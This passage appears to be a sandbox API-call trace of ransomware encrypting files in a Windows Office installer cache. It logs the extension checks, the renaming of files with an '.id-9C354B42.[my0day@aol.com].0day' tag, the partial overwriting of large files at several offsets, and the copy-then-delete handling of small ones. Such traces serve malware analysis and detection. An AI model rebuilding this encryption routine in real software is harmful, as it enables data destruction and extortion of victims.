Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString=".jpg") returned 4 [0042.691] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString=".doc") returned 4 [0042.691] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString=".docx") returned 5 [0042.691] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.691] lstrlenW (lpString=".pdf") returned 4 [0042.691] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString=".xls") returned 4 [0042.692] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString=".xlsx") returned 5 [0042.692] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.692] lstrlenW (lpString=".ppt") returned 4 [0042.692] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.692] lstrlenW (lpString=".zip") returned 4 [0042.692] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString=".rar") returned 4 [0042.692] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString=".bz2") returned 4 [0042.692] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.692] lstrlenW (lpString=".7z") returned 3 [0042.692] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.692] lstrlenW (lpString=".dbf") returned 4 [0042.692] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.692] lstrlenW (lpString=".1cd") returned 4 [0042.692] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.692] lstrlenW (lpString=".jpg") returned 4 [0042.692] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.692] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0042.692] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0042.692] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.693] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=2507776) returned 1 [0042.693] CloseHandle (hObject=0x208) returned 1 [0042.693] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0042.693] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.693] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.694] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.694] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.694] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.694] ReadFile (in: hFile=0x208, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.698] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.698] ReadFile (in: hFile=0x208, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.707] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.707] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.707] ReadFile (in: hFile=0x208, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.722] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.722] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0042.910] SetEndOfFile (hFile=0x208) returned 1 [0042.910] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fda0c0 [0042.914] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.914] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.916] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.916] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.921] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.921] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.924] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fda0c0 | out: hHeap=0x5f0000) returned 1 [0042.924] CloseHandle (hObject=0x208) returned 1 [0042.924] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.924] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.924] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.924] lstrlenW (lpString=".doc") returned 4 [0042.924] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.924] lstrlenW (lpString=".docx") returned 5 [0042.925] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.925] lstrlenW (lpString=".pdf") returned 4 [0042.925] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.925] lstrlenW (lpString=".xls") returned 4 [0042.925] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.925] lstrlenW (lpString=".xlsx") returned 5 [0042.925] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.925] lstrlenW (lpString=".ppt") returned 4 [0042.925] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString=".zip") returned 4 [0042.925] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.925] lstrlenW (lpString=".rar") returned 4 [0042.925] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.925] lstrlenW (lpString=".bz2") returned 4 [0042.925] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.925] lstrlenW (lpString=".7z") returned 3 [0042.925] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString=".dbf") returned 4 [0042.925] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString=".1cd") returned 4 [0042.925] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString=".jpg") returned 4 [0042.925] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.925] lstrlenW (lpString=".doc") returned 4 [0042.925] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.925] lstrlenW (lpString=".docx") returned 5 [0042.925] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.926] lstrlenW (lpString=".pdf") returned 4 [0042.926] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.926] lstrlenW (lpString=".xls") returned 4 [0042.926] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.926] lstrlenW (lpString=".xlsx") returned 5 [0042.926] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.926] lstrlenW (lpString=".ppt") returned 4 [0042.926] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.926] lstrlenW (lpString=".zip") returned 4 [0042.926] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.926] lstrlenW (lpString=".rar") returned 4 [0042.926] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.926] lstrlenW (lpString=".bz2") returned 4 [0042.926] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.926] lstrlenW (lpString=".7z") returned 3 [0042.926] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.926] lstrlenW (lpString=".dbf") returned 4 [0042.926] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.926] lstrlenW (lpString=".1cd") returned 4 [0042.926] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0042.926] lstrlenW (lpString=".jpg") returned 4 [0042.926] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.926] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0042.926] lstrlenW (lpString="dwintl20.dll") returned 12 [0042.926] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.927] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=107912) returned 1 [0042.927] CloseHandle (hObject=0x208) returned 1 [0042.927] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0042.927] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.927] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.927] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.519] GetLastError () returned 0x0 [0043.519] ReadFile (in: hFile=0x208, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x1a588, lpOverlapped=0x0) returned 1 [0043.523] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x1a590, lpOverlapped=0x0) returned 1 [0043.525] ReadFile (in: hFile=0x208, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.526] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.526] SetEndOfFile (hFile=0x198) returned 1 [0043.526] CloseHandle (hObject=0x198) returned 1 [0043.526] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.526] SetEndOfFile (hFile=0x208) returned 1 [0043.527] CloseHandle (hObject=0x208) returned 1 [0043.527] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0043.527] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString=".doc") returned 4 [0043.528] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString=".docx") returned 5 [0043.528] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.528] lstrlenW (lpString=".pdf") returned 4 [0043.528] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString=".xls") returned 4 [0043.528] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString=".xlsx") returned 5 [0043.528] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.528] lstrlenW (lpString=".ppt") returned 4 [0043.528] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString=".zip") returned 4 [0043.528] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString=".rar") returned 4 [0043.528] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.528] lstrlenW (lpString=".bz2") returned 4 [0043.528] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.528] lstrlenW (lpString=".7z") returned 3 [0043.528] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString=".dbf") returned 4 [0043.528] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString=".1cd") returned 4 [0043.528] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.528] lstrlenW (lpString=".jpg") returned 4 [0043.529] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString=".doc") returned 4 [0043.529] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString=".docx") returned 5 [0043.529] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.529] lstrlenW (lpString=".pdf") returned 4 [0043.529] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString=".xls") returned 4 [0043.529] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString=".xlsx") returned 5 [0043.529] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.529] lstrlenW (lpString=".ppt") returned 4 [0043.529] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString=".zip") returned 4 [0043.529] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString=".rar") returned 4 [0043.529] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.529] lstrlenW (lpString=".bz2") returned 4 [0043.529] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.529] lstrlenW (lpString=".7z") returned 3 [0043.529] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString=".dbf") returned 4 [0043.529] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString=".1cd") returned 4 [0043.529] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.529] lstrlenW (lpString=".jpg") returned 4 [0043.529] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.530] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0043.530] lstrlenW (lpString="OfficeLR.cab") returned 12 [0043.530] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0043.530] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=14127746) returned 1 [0043.530] CloseHandle (hObject=0x208) returned 1 [0043.530] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0043.530] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.530] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0043.531] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0043.531] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.531] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.531] ReadFile (in: hFile=0x208, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.535] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.535] ReadFile (in: hFile=0x208, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.538] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.538] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.538] ReadFile (in: hFile=0x208, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.552] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.552] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, 